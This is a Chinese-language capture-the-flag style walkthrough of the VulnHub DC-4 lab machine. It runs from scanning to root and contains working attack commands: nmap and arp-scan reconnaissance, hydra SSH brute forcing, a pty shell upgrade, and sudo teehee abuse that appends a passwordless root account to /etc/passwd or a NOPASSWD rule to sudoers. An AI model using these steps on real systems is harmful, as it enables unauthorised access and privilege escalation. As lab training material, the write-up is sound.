红队打靶 | vulnhub系列:DC-4

admin 2023年6月30日14:13:28评论24 views字数 1038阅读3分27秒阅读模式

点击蓝字 关注我们

红队打靶 | vulnhub系列:DC-4

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

DC-4打靶记录

靶机获取地址

https://www.vulnhub.com/entry/dc-4,313/

一、存活主机探测

arp-scan -l

红队打靶 | vulnhub系列:DC-4

确定IP

192.168.117.153

二、端口信息扫描

选择快速半开全端口扫描

nmap -sS -A -T4 -p 1-65535 192.168.117.153

红队打靶 | vulnhub系列:DC-4

确定目标

先访问80 端口

三、Getshell

红队打靶 | vulnhub系列:DC-4

啊???

开局一个登录框 呢这不能忍

弱口令、万能密码、爆破

直接弱口令 + 万能密码 + 爆破一起来。

红队打靶 | vulnhub系列:DC-4

啊?这这估计是后端设置的爆破次数 怕有些师傅们字典不行

反正就是进去了

进去之后 ,啊?直接一个RCE吗?

红队打靶 | vulnhub系列:DC-4

只能执行三个吗?

我不信!抓包看一下

红队打靶 | vulnhub系列:DC-4

果然,尝试一下反弹shell

红队打靶 | vulnhub系列:DC-4

这里有个小问题 它默认用加号代替空格了红队打靶 | vulnhub系列:DC-4

我这边等的话shell过来了

红队打靶 | vulnhub系列:DC-4

然后用python反弹出一个完整shell

python -c 'import pty;pty.spawn("/bin/bash")'

红队打靶 | vulnhub系列:DC-4

四、提权

看看/etc/passwd

红队打靶 | vulnhub系列:DC-4

老说法 咱有个22端口没有用

翻翻家目录

试试找好密码来爆破ssh到charles里面

红队打靶 | vulnhub系列:DC-4

这个时候在jim里面发现一个旧密码包

做成密码包

hydra -L xxx -P xxx ssh://xxx.xxx.xxx

红队打靶 | vulnhub系列:DC-4

成功出来一个用户名密码

登录去看看

红队打靶 | vulnhub系列:DC-4

有一个邮件 好吧

查看邮箱

cat /var/mail/jim

红队打靶 | vulnhub系列:DC-4

里面有密码

切换到charles

sudo -l

发现teehee可用

teehee --help

红队打靶 | vulnhub系列:DC-4

发现可以向文件里面写入内容

所以我们有两种提权办法

方法一:写/etc/passwd文件

echo "ikkkk::0:0:root:/root:/bin/bash" | sudo teehee -a /etc/passwd

方法二:写入sudoers文件

echo "charles ALL=(ALL:ALL)NOPASSWD:ALL" | sudo teehee -a /etc/sudoers"

原文始发于微信公众号(SecHub网络安全社区):红队打靶 | vulnhub系列:DC-4

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月30日14:13:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队打靶 | vulnhub系列:DC-4http://cn-sec.com/archives/1846089.html

发表评论

匿名网友 填写信息